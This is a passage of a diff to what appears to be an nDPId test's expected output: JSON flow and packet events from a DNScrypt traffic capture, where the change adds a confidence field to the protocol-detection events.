+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMcgAH4RTqIKAAABVQVd5t8CIPsGBKCC4+8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMcAuX4Rc3UKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMkgAH4RTqAKAAABVQVd5spyIPsGBLUQ4\/EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMggAH4RTqEKAAABVQVd5plbIPsGBOYr4+0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMgAuX4Rc3QKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":477,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":478,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMkAuX4Rc3MKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -984,34 +984,34 @@
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":946739381017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739381017,"pkt":"ZmZmZmZmRERERERECABFAADPeUxAADQRWSpVBV3mCgAAASD73wIAu3q74++BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAQmF4jrNkSB0NiNqctWCLsz9Hoe15aS6mrwyMq15DMDKxowa47TLEyU+dCwefDt3RvbYdetUltVlZd+8gb8kmCcgRT\/L7wkmA5gU0xv13eDWtHcb4jTpxlTH+X73K1n94yBFP8vvCSYAAAAABX1Nm5l9UuGY="}
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":946739381017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739381017,"pkt":"ZmZmZmZmRERERERECABFAADPeU1AADQRWSlVBV3mCgAAASD7mVsAu8Bk4+2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAQmF4jrNkSB0NiNqctWCLsz9Hoe15aS6mrwyMq15DMDKxowa47TLEyU+dCwefDt3RvbYdetUltVlZd+8gb8kmCcgRT\/L7wkmA5gU0xv13eDWtHcb4jTpxlTH+X73K1n94yBFP8vvCSYAAAAABX1Nm5l9UuGY="}
 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":946739381021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739381021,"pkt":"ZmZmZmZmRERERERECABFAADPeU5AADQRWShVBV3mCgAAASD7ynIAu49J4\/GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAQmF4jrNkSB0NiNqctWCLsz9Hoe15aS6mrwyMq15DMDKxowa47TLEyU+dCwefDt3RvbYdetUltVlZd+8gb8kmCcgRT\/L7wkmA5gU0xv13eDWtHcb4jTpxlTH+X73K1n94yBFP8vvCSYAAAAABX1Nm5l9UuGY="}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
